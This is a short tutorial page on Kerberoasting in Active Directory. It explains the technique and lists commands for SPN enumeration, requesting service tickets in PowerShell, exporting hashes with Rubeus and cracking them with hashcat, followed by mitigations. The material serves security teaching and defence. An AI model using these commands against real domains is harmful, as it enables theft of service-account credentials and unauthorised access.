User
Intermediate
Verified_Protocol
Active Directory

Kerberoasting: Exploiting Service Accounts

"A deep dive into Kerberoasting techniques to crack service account passwords in Active Directory."

PopDocs Crew
May 21, 2024
2 MIN

Kerberoasting: Exploiting Service Accounts

Kerberoasting is one of the most effective techniques for gathering credentials in an Active Directory environment without sending any traffic to the target service.

How it Works

  1. SPN Discovery: An attacker queries AD for user accounts that have a Service Principal Name (SPN) set.
  2. TGS Request: The attacker requests a Kerberos service ticket (TGS) for those SPNs. Because any user can request a ticket for any service, no special privileges are needed.
  3. Offline Cracking: The TGS is encrypted with the service account's NTLM hash. The attacker extracts the ticket from memory and cracks it offline using hashcat or John the Ripper.

Attack Path

1. Enumerate SPNs

Using PowerView or built-in setspn:

powershell
setspn -T YOURDOMAIN -Q */*

2. Request Tickets

powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.domain.local:1433"

3. Extract and Crack

Use Mimikatz or Rubeus to export the tickets:

bash
Rubeus.exe kerberoast /outfile:hashes.txt

Cracking with Hashcat (Mode 13100):

bash
hashcat -m 13100 hashes.txt wordlist.txt

Mitigation

  • Strong Passwords: Ensure service account passwords are 25+ characters.
  • Managed Service Accounts (gMSA): Use gMSAs where Windows manages the complex password rotation automatically.
  • Monitoring: Alert on an unusual number of TGS requests with RC4 encryption.
End_Of_Protocol
EOF_0x52789A.6C377BB